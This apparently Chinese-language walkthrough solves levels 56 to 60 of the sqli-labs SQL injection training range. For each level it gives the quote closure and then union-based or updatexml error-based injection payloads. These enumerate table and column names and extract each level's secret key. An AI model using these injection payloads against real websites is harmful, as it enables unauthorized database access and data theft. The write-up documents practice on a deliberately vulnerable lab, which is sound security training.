主页有sqli-labs靶场通关攻略 1-55
第五六关 less-56
步骤一:闭合方式:?id=1')-- +
步骤二:查询数据库
?id=-1') union select 1,2,database() --+
步骤三:联合查询 查出网站的数据库表名
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- +
oem1p64ku9
步骤四:联合查询 查出users表列名
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oem1p64ku9'-- +
secret_69QZ
步骤五:获取目标信息
?id=-1') union select 1,2,secret_69QZ from challenges.oem1p64ku9-- +
输入登录框,提交成功
第五七关 less-57
步骤一:闭合方式:?id=1"-- +
步骤二:查询数据库
?id=-1" union select 1,2,database() --+
步骤三:联合查询 查出网站的数据库表名
?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- +
ufon3t1nq1
步骤四:联合查询 查出users表列名
?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ufon3t1nq1'-- +
secret_3WDG
步骤五:获取目标信息
?id=-1" union select 1,2,secret_3WDG from challenges.ufon3t1nq1-- +
rVaX7lFCcWbcinJHz4XPLQHr
输入登录框,提交成功
第五八关 less-58
步骤一:闭合方式:?id=1' --+
步骤二:查询数据库
?id=1' and updatexml(1,concat(1,database()),1) --+
步骤三:查出网站的数据库表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +
3lqqm8344u
步骤四:查出users表列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='3lqqm8344u '),0x7e),1)-- +
secret_XXL3
步骤五:获取目标信息
?id=1' and updatexml(1,concat(0x7e,(select secret_XXL3 from challenges.3lqqm8344u),0x7e),1)-- +
4oNbuAyDfYPLcH67K20xQzDh
输入登录框,提交成功
第五九关 less-59
步骤一:闭合方式:?id=1 --+
步骤二:查询数据库
?id=1 a nd updatexml(1,concat(1,database()),1) --+
步骤三:查出网站的数据库表名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +
6bkswmx018
步骤四:查出users表列名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6bkswmx018'),0x7e),1)-- +
secret_BIXB
步骤五:获取目标信息
?id=1 and updatexml(1,concat(0x7e,(select secret_BIXB from challenges.6bkswmx018),0x7e),1)-- +
joyZrDvuYEZQqVbuAaEfN5N4
输入登录框,提交成功
第六十关 less-60
步骤一:闭合方式:?id=1") --+
步骤二:查询数据库
?id=1") and updatexml(1,concat(1,database()),1) --+
步骤三:查出网站的数据库表名
?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +
9ihh6w5lpg
步骤四:查出users表列名
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='9ihh6w5lpg'),0x7e),1)-- +
secret_CHXB
步骤五:获取目标信息
?id=1") and updatexml(1,concat(0x7e,(select secret_CHXB from challenges.9ihh6w5lpg),0x7e),1)-- +
vi4845P9Xmp8nfKaCUmEsNod
输入登录框,提交成功
